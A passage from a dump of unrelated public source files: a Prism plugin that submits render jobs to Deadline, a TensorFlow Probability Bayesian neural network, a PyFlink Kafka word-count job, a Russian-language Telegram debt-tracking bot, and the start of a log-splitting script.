The unused handles are then closed immediatley afterwards.\n proc = subprocess.Popen(\n arguments,\n cwd=deadlineBin,\n stdin=subprocess.PIPE,\n stdout=stdoutPipe,\n stderr=subprocess.PIPE,\n startupinfo=startupinfo,\n creationflags=creationflags,\n )\n proc.stdin.close()\n proc.stderr.close()\n\n output = \"\"\n if readStdout:\n output = proc.stdout.read()\n return output\n\n @err_catcher(name=__name__)\n def blenderDeadlineCommand(self):\n deadlineBin = \"\"\n try:\n deadlineBin = os.environ[\"DEADLINE_PATH\"]\n except KeyError:\n pass\n\n if deadlineBin == \"\":\n return None\n\n deadlineCommand = os.path.join(deadlineBin, \"deadlinecommand\")\n\n return deadlineCommand\n\n @err_catcher(name=__name__)\n def getDeadlineGroups(self, subdir=None):\n if not hasattr(self, \"deadlineGroups\"):\n if self.core.appPlugin.pluginName == \"Blender\":\n deadlineCommand = self.blenderDeadlineCommand()\n\n if deadlineCommand is None:\n return []\n\n startupinfo = None\n\n args = [deadlineCommand, \"-groups\"]\n if subdir != None and subdir != \"\":\n args.append(subdir)\n\n # Specifying PIPE for all handles to workaround a Python bug on Windows. The unused handles are then closed immediatley afterwards.\n proc = subprocess.Popen(\n args,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n startupinfo=startupinfo,\n )\n\n proc.stdin.close()\n proc.stderr.close()\n\n output = proc.stdout.read()\n\n output = output.decode(\"utf_8\")\n\n else:\n output = self.deadlineCommand([\"-groups\"])\n\n if output != False and not \"Error\" in output:\n self.deadlineGroups = output.splitlines()\n else:\n self.deadlineGroups = []\n\n return self.deadlineGroups\n\n @err_catcher(name=__name__)\n def sm_dep_startup(self, origin):\n origin.tw_caches.itemClicked.connect(\n lambda x, y: self.sm_updateDlDeps(origin, x, y)\n )\n origin.tw_caches.itemDoubleClicked.connect(self.sm_dlGoToNode)\n\n @err_catcher(name=__name__)\n def sm_updateDlDeps(self, origin, item, column):\n if len(item.toolTip(0).split(\"\\n\")) == 1:\n return\n\n if (\n item.toolTip(0).split(\"\\n\")[1]\n in [x.split(\"\\n\")[1] for x in origin.dependencies[\"Deadline\"]]\n and item.checkState(0) == Qt.Unchecked\n ):\n origin.dependencies[\"Deadline\"].remove(item.toolTip(0))\n elif (\n not item.toolTip(0).split(\"\\n\")[1]\n in [x.split(\"\\n\")[1] for x in origin.dependencies[\"Deadline\"]]\n ) and item.checkState(0) == Qt.Checked:\n origin.dependencies[\"Deadline\"].append(item.toolTip(0))\n\n origin.nameChanged(origin.e_name.text())\n\n origin.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def sm_dlGoToNode(self, item, column):\n if item.parent() is None:\n return\n\n node = hou.node(item.toolTip(0).split(\"\\n\")[1])\n\n if node is not None:\n node.setCurrent(True, clear_all_selected=True)\n paneTab = hou.ui.paneTabOfType(hou.paneTabType.NetworkEditor)\n if paneTab is not None:\n paneTab.frameSelection()\n\n @err_catcher(name=__name__)\n def sm_dep_updateUI(self, origin):\n origin.gb_osDependency.setVisible(False)\n origin.gb_dlDependency.setVisible(True)\n\n origin.tw_caches.clear()\n QTreeWidgetItem(origin.tw_caches, [\"Import\"])\n QTreeWidgetItem(origin.tw_caches, [\"Export\"])\n\n fileNodeList = []\n copFileNodeList = []\n ropDopNodeList = []\n ropCopNodeList = []\n ropSopNodeList = []\n ropAbcNodeList = []\n filecacheNodeList = []\n\n for node in hou.node(\"/\").allSubChildren():\n if node.type().name() == \"file\":\n if (\n node.type().category().name() == \"Sop\"\n and 
len(node.parm(\"file\").keyframes()) == 0\n ):\n fileNodeList.append(node)\n elif (\n node.type().category().name() == \"Cop2\"\n and len(node.parm(\"filename1\").keyframes()) == 0\n ):\n copFileNodeList.append(node)\n elif (\n node.type().name() == \"rop_dop\"\n and len(node.parm(\"dopoutput\").keyframes()) == 0\n ):\n ropDopNodeList.append(node)\n elif (\n node.type().name() == \"rop_comp\"\n and len(node.parm(\"copoutput\").keyframes()) == 0\n ):\n ropCopNodeList.append(node)\n elif (\n node.type().name() == \"rop_geometry\"\n and len(node.parm(\"sopoutput\").keyframes()) == 0\n ):\n ropSopNodeList.append(node)\n elif (\n node.type().name() == \"rop_alembic\"\n and len(node.parm(\"filename\").keyframes()) == 0\n ):\n ropAbcNodeList.append(node)\n elif (\n node.type().name() == \"filecache\"\n and len(node.parm(\"file\").keyframes()) == 0\n ):\n filecacheNodeList.append(node)\n\n for i in fileNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(0), [itemName])\n item.setToolTip(0, i.parm(\"file\").unexpandedString() + \"\\n\" + i.path())\n\n for i in copFileNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(0), [itemName])\n item.setToolTip(0, i.parm(\"filename1\").unexpandedString() + \"\\n\" + i.path())\n\n for i in ropDopNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"dopoutput\").unexpandedString() + \"\\n\" + i.path())\n\n for i in ropCopNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"copoutput\").unexpandedString() + \"\\n\" + i.path())\n\n for i in ropSopNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"sopoutput\").unexpandedString() + \"\\n\" + i.path())\n\n for i in filecacheNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"file\").unexpandedString() + \"\\n\" + i.path())\n\n # alembic dependency disabled because no progress measureable\n for i in ropAbcNodeList:\n itemName = os.path.basename(i.parm(\"filename\").unexpandedString())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"filename\").unexpandedString() + \"\\n\" + i.path())\n\n items = []\n for i in range(origin.tw_caches.topLevelItemCount()):\n origin.tw_caches.topLevelItem(i).setExpanded(True)\n for k in range(origin.tw_caches.topLevelItem(i).childCount()):\n items.append(origin.tw_caches.topLevelItem(i).child(k))\n\n newActive = []\n for i in items:\n if i.toolTip(0).split(\"\\n\")[1] in [\n x.split(\"\\n\")[1] for x in origin.dependencies[\"Deadline\"]\n ]:\n i.setCheckState(0, Qt.Checked)\n newActive.append(i.toolTip(0))\n else:\n i.setCheckState(0, Qt.Unchecked)\n\n origin.dependencies[\"Deadline\"] = newActive\n\n @err_catcher(name=__name__)\n def sm_dep_preExecute(self, origin):\n warnings = []\n\n return warnings\n\n @err_catcher(name=__name__)\n def sm_dep_execute(self, origin, parent):\n origin.dependencies[\"Deadline\"] = [\n x\n if not x.split(\"\\n\")[0]\n in origin.stateManager.publishInfos[\"updatedExports\"]\n else \"%s\\n%s\"\n % (\n origin.stateManager.publishInfos[\"updatedExports\"][x.split(\"\\n\")[0]],\n x.split(\"\\n\")[1],\n )\n for x in 
origin.dependencies[\"Deadline\"]\n ]\n\n parent.dependencies += [\n [origin.sp_offset.value(), hou.expandString(x.split(\"\\n\")[0])]\n for x in origin.dependencies[\"Deadline\"]\n ]\n\n @err_catcher(name=__name__)\n def sm_houExport_startup(self, origin):\n origin.cb_dlGroup.addItems(self.getDeadlineGroups())\n\n @err_catcher(name=__name__)\n def sm_houExport_activated(self, origin):\n origin.f_osDependencies.setVisible(False)\n origin.f_osUpload.setVisible(False)\n origin.f_osPAssets.setVisible(False)\n origin.gb_osSlaves.setVisible(False)\n origin.f_dlGroup.setVisible(True)\n\n @err_catcher(name=__name__)\n def sm_houExport_preExecute(self, origin):\n warnings = []\n\n return warnings\n\n @err_catcher(name=__name__)\n def sm_houRender_updateUI(self, origin):\n showGPUsettings = (\n origin.node is not None and origin.node.type().name() == \"Redshift_ROP\"\n )\n origin.w_dlGPUpt.setVisible(showGPUsettings)\n origin.w_dlGPUdevices.setVisible(showGPUsettings)\n\n @err_catcher(name=__name__)\n def sm_houRender_managerChanged(self, origin):\n origin.f_osDependencies.setVisible(False)\n origin.f_osUpload.setVisible(False)\n\n origin.f_osPAssets.setVisible(False)\n origin.gb_osSlaves.setVisible(False)\n origin.f_dlGroup.setVisible(True)\n\n origin.w_dlConcurrentTasks.setVisible(True)\n\n showGPUsettings = (\n origin.node is not None and origin.node.type().name() == \"Redshift_ROP\"\n )\n origin.w_dlGPUpt.setVisible(showGPUsettings)\n origin.w_dlGPUdevices.setVisible(showGPUsettings)\n\n @err_catcher(name=__name__)\n def sm_houRender_preExecute(self, origin):\n warnings = []\n\n return warnings\n\n @err_catcher(name=__name__)\n def sm_render_updateUI(self, origin):\n curRenderer = getattr(self.core.appPlugin, \"getCurrentRenderer\", lambda x: \"\")(\n origin\n ).lower()\n showGPUsettings = \"redshift\" in curRenderer if curRenderer else True\n origin.w_dlGPUpt.setVisible(showGPUsettings)\n origin.w_dlGPUdevices.setVisible(showGPUsettings)\n\n @err_catcher(name=__name__)\n def sm_render_managerChanged(self, origin):\n origin.f_osDependencies.setVisible(False)\n origin.gb_osSlaves.setVisible(False)\n origin.f_osUpload.setVisible(False)\n\n origin.f_dlGroup.setVisible(True)\n origin.w_dlConcurrentTasks.setVisible(True)\n\n curRenderer = getattr(self.core.appPlugin, \"getCurrentRenderer\", lambda x: \"\")(\n origin\n ).lower()\n showGPUsettings = \"redshift\" in curRenderer if curRenderer else True\n origin.w_dlGPUpt.setVisible(showGPUsettings)\n origin.w_dlGPUdevices.setVisible(showGPUsettings)\n\n getattr(self.core.appPlugin, \"sm_render_managerChanged\", lambda x, y: None)(\n origin, False\n )\n\n @err_catcher(name=__name__)\n def sm_render_preExecute(self, origin):\n warnings = []\n\n return warnings\n\n @err_catcher(name=__name__)\n def sm_render_submitJob(self, origin, jobOutputFile, parent):\n if self.core.appPlugin.pluginName == \"Houdini\":\n jobOutputFile = jobOutputFile.replace(\"$F4\", \"####\")\n\n homeDir = (\n self.deadlineCommand([\"-GetCurrentUserHomeDirectory\"], background=False)\n ).decode(\"utf-8\")\n\n if homeDir == False:\n return \"Execute Canceled: Deadline is not installed\"\n\n homeDir = homeDir.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n\n dependencies = parent.dependencies\n\n jobName = (\n os.path.splitext(self.core.getCurrentFileName(path=False))[0]\n + origin.l_taskName.text()\n )\n jobGroup = origin.cb_dlGroup.currentText()\n jobPrio = origin.sp_rjPrio.value()\n jobTimeOut = str(origin.sp_rjTimeout.value())\n jobMachineLimit = \"0\"\n jobFamesPerTask = 
origin.sp_rjFramesPerTask.value()\n concurrentTasks = (\n 1\n if not hasattr(origin, \"sp_dlConcurrentTasks\")\n else origin.sp_dlConcurrentTasks.value()\n )\n\n if origin.chb_globalRange.isChecked():\n jobFrames = (\n str(origin.stateManager.sp_rangeStart.value())\n + \"-\"\n + str(origin.stateManager.sp_rangeEnd.value())\n )\n else:\n jobFrames = (\n str(origin.sp_rangeStart.value())\n + \"-\"\n + str(origin.sp_rangeEnd.value())\n )\n\n # Create submission info file\n\n jobInfos = {}\n\n jobInfos[\"Name\"] = jobName\n jobInfos[\"Group\"] = jobGroup\n jobInfos[\"Priority\"] = jobPrio\n jobInfos[\"TaskTimeoutMinutes\"] = jobTimeOut\n jobInfos[\"MachineLimit\"] = jobMachineLimit\n jobInfos[\"Frames\"] = jobFrames\n jobInfos[\"ChunkSize\"] = jobFamesPerTask\n jobInfos[\"OutputFilename0\"] = jobOutputFile\n jobInfos[\n \"EnvironmentKeyValue0\"\n ] = \"prism_project=%s\" % self.core.prismIni.replace(\"\\\\\", \"/\")\n\n if origin.chb_rjSuspended.isChecked():\n jobInfos[\"InitialStatus\"] = \"Suspended\"\n\n if (\n hasattr(origin, \"w_dlConcurrentTasks\")\n and not origin.w_dlConcurrentTasks.isHidden()\n ):\n jobInfos[\"ConcurrentTasks\"] = concurrentTasks\n\n if len(dependencies) > 0:\n jobInfos[\"IsFrameDependent\"] = \"true\"\n jobInfos[\"ScriptDependencies\"] = os.path.join(\n self.core.projectPath, \"00_Pipeline\", \"Scripts\", \"DeadlineDependency.py\"\n )\n\n # Create plugin info file\n\n pluginInfos = {}\n pluginInfos[\"Build\"] = \"64bit\"\n\n if hasattr(origin, \"w_dlGPUpt\") and not origin.w_dlGPUpt.isHidden():\n pluginInfos[\"GPUsPerTask\"] = origin.sp_dlGPUpt.value()\n\n if hasattr(origin, \"w_dlGPUdevices\") and not origin.w_dlGPUdevices.isHidden():\n pluginInfos[\"GPUsSelectDevices\"] = origin.le_dlGPUdevices.text()\n\n dlParams = {\n \"jobInfos\": jobInfos,\n \"pluginInfos\": pluginInfos,\n \"jobInfoFile\": \"\",\n \"pluginInfoFile\": \"\",\n }\n self.core.appPlugin.sm_render_getDeadlineParams(origin, dlParams, homeDir)\n\n if len(dependencies) > 0:\n dependencyFile = os.path.join(homeDir, \"temp\", \"dependencies.txt\")\n fileHandle = open(dependencyFile, \"w\")\n\n for i in dependencies:\n fileHandle.write(str(i[0]) + \"\\n\")\n fileHandle.write(str(i[1]) + \"\\n\")\n\n fileHandle.close()\n\n arguments = []\n arguments.append(dlParams[\"jobInfoFile\"])\n arguments.append(dlParams[\"pluginInfoFile\"])\n for i in self.core.appPlugin.getCurrentSceneFiles(origin):\n arguments.append(i)\n\n if \"dependencyFile\" in locals():\n arguments.append(dependencyFile)\n\n self.core.callback(\n name=\"preSubmit_Deadline\",\n types=[\"custom\"],\n args=[self, jobInfos, pluginInfos, arguments],\n )\n\n with open(dlParams[\"jobInfoFile\"], \"w\") as fileHandle:\n for i in jobInfos:\n fileHandle.write(\"%s=%s\\n\" % (i, jobInfos[i]))\n\n with open(dlParams[\"pluginInfoFile\"], \"w\") as fileHandle:\n for i in pluginInfos:\n fileHandle.write(\"%s=%s\\n\" % (i, pluginInfos[i]))\n\n jobResult = self.deadlineCommand(arguments, background=False).decode(\"utf-8\")\n\n self.core.callback(\n name=\"postSubmit_Deadline\", types=[\"custom\"], args=[self, jobResult]\n )\n\n return jobResult\n","repo_name":"heylenz/Prism","sub_path":"Prism/Plugins/RenderfarmManagers/Deadline/Scripts/Prism_Deadline_Functions.py","file_name":"Prism_Deadline_Functions.py","file_ext":"py","file_size_in_byte":18040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"22063012860","text":"import numpy as np\nimport math\nimport tensorflow as tf\nimport tensorflow_probability as 
tfp\nfrom tensorflow_probability.python.layers import util as tfp_layers_util\ntfd = tfp.distributions\n# some the research2018 repo can be accessed from https://github.com/dmorrill10/research2018.git\n\n\"\"\"\nCreates a learnable variational normal distribution\nBoth the mean and variance are parameterized and are learnable by tensorflow\nThe variance is constrained to be non-negative\n\"\"\"\ndef VariationalParameter(name, shape):\n means = tf.get_variable(name+'_mean', initializer=0.1 * tf.ones([1]), constraint=tf.keras.constraints.NonNeg())\n stds = tf.get_variable(name+'_std', initializer=1 * tf.ones([1]))\n return tfd.Normal(loc=means, scale=stds)\n\n\"\"\"\nCreates a *non*-learnable vector of normal distributions\nThis is used to regularize the weights\nWeights will be pulled towards this distribution on each step\n\"\"\"\nclass KernelPrior:\n def __init__(self, stddev):\n self.stddev = stddev\n\n def output(self, dtype, shape, name, trainable, add_variable_fn):\n dist = tfd.Normal(loc=tf.zeros(shape, dtype), scale=dtype.as_numpy_dtype(self.stddev)) #prior mean is zeros\n batch_ndims = tf.size(dist.batch_shape_tensor())\n return tfd.Independent(dist, reinterpreted_batch_ndims=batch_ndims)\n\nclass BNN:\n def __init__(self, features, params={'prior_mean_hidden_layer': -1e-5,\n 'prior_stddev_hidden_layer': 1e-6,\n 'prior_stddev_outer_layer': 1e-8}):\n self.features = features\n # Inputs to the tensorflow graph. X will be our phi(S, A), Y will be our reward\n self.X = tf.placeholder(tf.float32, [None, features])\n self.Y = tf.placeholder(tf.float32, [None, 1])\n self.hidden_layer_mean = params['prior_mean_hidden_layer']\n self.hidden_layer_stddev = params['prior_stddev_hidden_layer']\n self.outer_layer_sttdev = params['prior_stddev_outer_layer']\n\n # Should be expandable to a deep network by adding more layers\n # Can add dense flipout layers for fully bayesian or could add simple dense or convolutional layers\n # to project into a smaller feature space before doing full distributions (would be more computationally efficient)\n self.layers = tf.keras.Sequential([\n tfp.layers.DenseFlipout(\n # one output for estimating the reward\n 1,\n # the _prior_ distribution over our weights (even though it says posterior, it is the prior in the bayes rule sense)\n # this creates a vector of learnable independent normal distributions\n kernel_posterior_fn=tfp_layers_util.default_mean_field_normal_fn(\n # initialize the mean of the normal distributions randomly so that the means are slightly negative (pessimistic init)\n loc_initializer=tf.random_normal_initializer(mean=self.hidden_layer_mean, stddev=self.hidden_layer_stddev) # prior mean and stddev of nodes in hidden layer\n ),\n # regularize our weights by pulling them towards a N(0, 1e-8) distribution\n # cannot have a N(0, 0) distribution, so pull them towards something with no variance\n kernel_prior_fn=KernelPrior(self.outer_layer_sttdev).output, # prior stddev over y's (outputs, in our case th rewards)\n # Don't use a bias weight here\n bias_posterior_fn=None, # set to None to keep everything local (local variance over all features)\n )\n ])\n\n # make predictions by sampling weights from the posterior and multiplying phi(S, A)\n self.predictions = self.layers(self.X)\n # model the variance of the noise on Y with a learnable normal distribution\n std = VariationalParameter('noise_std', [1])\n # build the distribution over Y ~ N(W*phi(S, A), std)\n pred_dist = tfd.Normal(loc=self.predictions, scale=std.sample())\n\n # Build the loss 
function\n # get the log probability of observing this value of Y given our parameters: P(Y | theta)\n log_prob = pred_dist.log_prob(self.Y)\n # make sure this log probability isn't nan (bug in tensorflow when variance approaches 0. if it is nan, just set it to zero)\n non_nan = tf.where(tf.is_nan(log_prob), tf.zeros_like(log_prob), log_prob)\n # get the mean over the outputs (only 1 output for now so this isn't really necessary, but it is good to be generic)\n neg_log_prob = -tf.reduce_mean(non_nan)\n # The KL-divergence is what trains the variance over the weights, the neg_log_prob is the loss over the mean\n # The KL-divergence is added as a \"regularizer\" to the layers as a hack to make this work with the tensorflow infrastructure (that's how tfp works)\n kl_div = sum(self.layers.losses)\n # the ELBO loss is just the sum of the loss over the variance (kl-div) and the loss over the mean (neg_log_prob)\n elbo_loss = neg_log_prob + kl_div\n\n # minimize the loss using some optimizer (adam with small learning rate seems to work well)\n optimizer = tf.train.AdamOptimizer(0.01)\n self.train = optimizer.minimize(elbo_loss)\n\n # initialize the tensorflow graph and get initial values of the weights\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n init_op.run()\n\n # makes sure that the X passed in is the right shape and size\n # if we accidentally pass in a tensor or vector, this should handle that case\n def normalizeXShape(self, x):\n return x.reshape((math.ceil(x.size / self.features), self.features))\n\n def fit(self, x, y, epochs=1):\n x = self.normalizeXShape(x)\n y = y.reshape((len(y), 1))\n feed = {self.X: x, self.Y: y}\n for _ in range(epochs):\n self.train.run(feed_dict=feed)\n\n def sample(self, x, samples=1000):\n x = self.normalizeXShape(x)\n m = np.tile(x, [samples, 1])\n feed = {self.X: m}\n p = self.predictions\n s = np.array(p.eval(feed_dict=feed)).flatten()\n s.sort()\n return s\n\nif __name__ == \"__main__\":\n print(tf.__version__)\n sess = tf.InteractiveSession()\n tf.set_random_seed(42)\n np.random.seed(42)\n #training-data:\n x = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype=np.float32)\n y = np.array([[0], [0], [0]], dtype=np.float32)\n\n # run model\n f = BNN(3)\n s = f.sample(np.array([[1., 0., 0.]]))\n # print(s)\n print(\"Untrained mean and var\", np.mean(s), np.std(s)**2)\n print(\"Weights\", f.layers.get_weights())\n f.fit(x, y, epochs=100)\n s = f.sample(np.array([[1., 0., 0.]]))\n print(np.mean(s), np.std(s)**2)\n print(f.layers.get_weights())\n","repo_name":"dchui1/659-project","sub_path":"src/bayesian_inference/BNN.py","file_name":"BNN.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74362694560","text":"from pyflink.common.serialization import SimpleStringSchema\nfrom pyflink.common.typeinfo import Types\nfrom pyflink.datastream import StreamExecutionEnvironment, RuntimeExecutionMode\nfrom pyflink.datastream.connectors.kafka import KafkaSource, KafkaSink\nfrom pyflink.datastream.execution_mode import ExecutionMode\nfrom pyflink.table.descriptors import Kafka\nfrom pyflink.table import StreamTableDescriptor\n\ndef main():\n env = StreamExecutionEnvironment.get_execution_environment()\n env.set_parallelism(1)\n env.set_runtime_mode(RuntimeExecutionMode.BATCH)\n\n # Kafka source configuration\n source = KafkaSource.builder() \\\n .set_bootstrap_servers(\"localhost:9092\") \\\n .set_topics(\"input-topic\") \\\n 
.set_group_id(\"my-group\") \\\n .set_starting_offsets(\"earliest\") \\\n .set_value_only_deserializer(SimpleStringSchema()) \\\n .build()\n\n # Define the transformation (e.g., word count)\n result = env.from_source(source, watermark_strategy=None, source_name=\"Kafka Source\") \\\n .flat_map(lambda x: x.split()) \\\n .map(lambda x: (x, 1), output_type=Types.ROW([Types.STRING(), Types.INT()])) \\\n .key_by(lambda x: x[0]) \\\n .reduce(lambda x, y: (x[0], x[1] + y[1]))\n\n # Kafka sink configuration\n sink = KafkaSink.builder() \\\n .set_bootstrap_servers(\"localhost:9092\") \\\n .set_record_serializer(\n KafkaRecordSerializationSchema.builder()\n .set_topic(\"output-topic\")\n .set_value_serialization_schema(SimpleStringSchema())\n .build()\n ) \\\n .set_delivery_guarantee(DeliveryGuarantee.AT_LEAST_ONCE) \\\n .build()\n\n result.sink_to(sink)\n\n # Execute the job\n env.execute(\"Kafka Source and Sink Example\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"razaviah/Real-Time-Time-Series-Data-Prediction","sub_path":"flink_job.py","file_name":"flink_job.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26145087866","text":"from aiogram import Bot, types\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.utils import executor\nimport re\nimport os\nfrom database import engine\n\nfrom crud import *\n\n\n\nTOKEN = os.getenv(\"TG_BOT_TOKEN\")\n\nbot = Bot(token=TOKEN)\ndp = Dispatcher(bot)\n\nreg_exp_duty_to_me = r'(@.{3,}) приторчал(а)? мне ([0-9]{,5}(.[0-9]{1,2})?)'\nreg_exp_payday = r'(@.{3,}) вернул(а)? мне ([0-9]{,5}(.[0-9]{1,2})?)'\nreg_exp_my_duty = r'Я задолжал(а)? (@.{3,}) ([0-9]{,5}(.[0-9]{1,2})?)'\nreg_exp_wipe_duty = r'Прощаю долг (@.{3,})'\n\n\n@dp.message_handler(commands=['start'])\nasync def send_welcome(msg: types.Message):\n await msg.answer(f'Я бот-счетовод. 
Приятно познакомиться, {msg.from_user.username}.\\nДля просмотра команд введите /help')\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n if msg.from_user.username == 'brochachox':\n await msg.answer(\"Не забудь про должок Лёхе;)\")\n\n\n\n@dp.message_handler(commands=['help'])\nasync def send_docs(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n await msg.answer(\n\"\"\"\n*\\<@Ник\\> приторчал\\(а\\) мне \\<Сума\\>* \\- _добавить долг вам_\n\n*Я задолжал\\(а\\) \\<@Ник\\> \\<Сума\\>* \\- _добавить ваш долг_\n\n*Прощаю долг \\<@Ник\\>* \\- _простить долг_\n\n*\\<@Ник\\> вернул\\(а\\) мне \\<Сума\\>* \\- _вычесть суму из долга_\n\n*Кому я задолжал\\(а\\)\\?* \\- _посмотреть свои долги_\n\n*Кто мне должен\\?* \\- _посмотреть должников_\n\n*Сколько мне должны\\?* \\- _посмотреть сумарный долг тебе_\n\n*Сколько я задолжал\\(а\\)\\?* \\- _посмотреть свой сумарный долг_\n\"\"\", parse_mode=\"MarkdownV2\")\n\n\n@dp.message_handler(lambda msg: re.fullmatch(reg_exp_duty_to_me, msg.text))\nasync def add_duty_to_me(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(reg_exp_duty_to_me, msg.text)\n debtor = m.group(1)\n amount = m.group(3)\n duty = add_duty(str(\"@\"+msg.from_user.username), str(debtor), float(amount))\n if not duty:\n await msg.answer(\"Вы в рассчете\")\n else:\n user = get_user_info(duty.debtor)\n if user:\n await bot.send_message(user.chat_id, f'Вы заторчали {duty.lender} {duty.amount}')\n await msg.answer(f'У {debtor} должок {duty.amount}')\n\n\n@dp.message_handler(lambda msg: re.fullmatch(reg_exp_my_duty, msg.text))\nasync def add_my_duty(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(reg_exp_my_duty, msg.text)\n lender = m.group(2)\n amount = m.group(3)\n duty = add_duty(str(lender), str(\"@\"+msg.from_user.username), float(amount))\n if not duty:\n await msg.answer(\"Ты ничего не должен.\")\n else:\n await msg.answer(f'Ты {\"должна\" if m.group(1) else \"должен\"} {duty.lender} {duty.amount}.')\n\n\n@dp.message_handler(lambda msg: re.fullmatch(reg_exp_payday, msg.text))\nasync def get_payment(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(reg_exp_payday, msg.text)\n debtor = m.group(1)\n amount = m.group(3)\n await msg.answer(payday(str(\"@\"+msg.from_user.username), debtor, float(amount)))\n\n\n@dp.message_handler(lambda msg: re.fullmatch(r'Кому я задолжал(а)?[\\?]', msg.text))\nasync def check_my_duties(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(r'Кому я задолжал((а)?)[\\?]', msg.text)\n duties = get_my_duties(str(\"@\"+msg.from_user.username))\n if not duties:\n await msg.answer(\"Пока долгов нету)\")\n else:\n for duty in duties:\n await msg.answer(f'Ты {\"должна\" if m.group(1) else \"должен\"} {duty.lender} {duty.amount}.')\n\n\n@dp.message_handler(lambda msg: re.fullmatch(r'Сколько я задолжал(а)?[\\?]', msg.text))\nasync def count_my_duties(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n total_duty = count_my_total_duty(str(\"@\"+msg.from_user.username))\n if total_duty:\n await msg.answer(f'Ты торчишь {total_duty}')\n else:\n await msg.answer(\"Никому ты не должен\")\n\n\n@dp.message_handler(lambda msg: msg.text == 'Кто мне должен?')\nasync def 
check_duties_to_me(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n duties = get_duties_for_me(str(\"@\"+msg.from_user.username))\n if not duties:\n await msg.answer(\"Пока должников нету.\")\n else:\n for duty in duties:\n await msg.answer(f'У {duty.debtor} должок {duty.amount}.')\n\n\n@dp.message_handler(lambda msg: msg.text == 'Сколько мне должны?')\nasync def count_duties_to_me(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n total_duty = count_total_duty_to_me(str(\"@\"+msg.from_user.username))\n if total_duty:\n await msg.answer(f'Тебе торчат {total_duty}')\n else:\n await msg.answer(\"Никто тебе не должен\")\n\n\n@dp.message_handler(lambda msg: re.fullmatch(reg_exp_wipe_duty, msg.text))\nasync def wipe_away_a_dept(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(reg_exp_wipe_duty, msg.text)\n debtor = m.group(1)\n if await wipe_away_the_dept(str(\"@\"+msg.from_user.username), debtor, bot):\n await msg.answer(\"Долг прощен.\")\n else:\n await msg.answer(\"Так он тебе и не должен нихрена.\")\n\n\nif __name__ == '__main__':\n if not os.path.exists('database.sqlite3'):\n print(\"Creating db...\")\n tables.Base.metadata.create_all(engine)\n print(\"Db has been created.\")\n executor.start_polling(dp)\n","repo_name":"Cheyzie/TGDebtBot","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42222408170","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nv0.005 12.07.2018 List and datestring has more firmly defined\nv0.004 06.07.2018 15:30 Function splittings now works with AM-sensor\nv0.003 06.07.2018 checkfolder now asks for sensor\nv0.002 24.05.2018 Now sucessfully splits a certain string in temp.log to its own file. 
Also removes noise!\nv0.001 Inital code, copied from merge.py\n'''\n\n\"\"\"\nSPLITS temp.log with the previous day, and only that day\nMoves that portio from merge.log to its own folder and file\n\nsplit.py (this) has the responsibillity for date-cehcking\n\"\"\"\n\"\"\"\ndef checkfolder CREATES files\n\"\"\"\n\nfrom colorama import init\ninit()\nfrom colorama import Fore, Back, Style\ninit(autoreset=True)\n\nimport os\n\n\ndef version():\n\treturn \"v0.001\"\n\n# Assume temp.log is todays log, but import/read/merge yesterday\n\nfrom datetime import datetime\n\n# 12.07.2018\n# Tror ikke denne heller brukes noe sted \ndef today():\n\td = datetime.now().isoformat()\n\te = d.find('T')\n\t# print(\"e: \"+str(e))\n\n\tf = d[0:e]\n\tprint(\"f: \"+str(f))\n\treturn(f)\n\ndef extractdate(f):\n\t\"\"\" 24.05.2018: Tror ikke jeg bruker denne \"\"\"\n\t\n\tyear = None\n\tmonth = None\n\tday = None\n\tprint(\"extractdate start with string: \"+str(f))\n\n\t# error checks\n\t\n\tif not len(f) >= 10:\n\t\tprint(\"String ikke lang nok\")\n\t\treturn None\n\t\n\tif not f.count('-') == 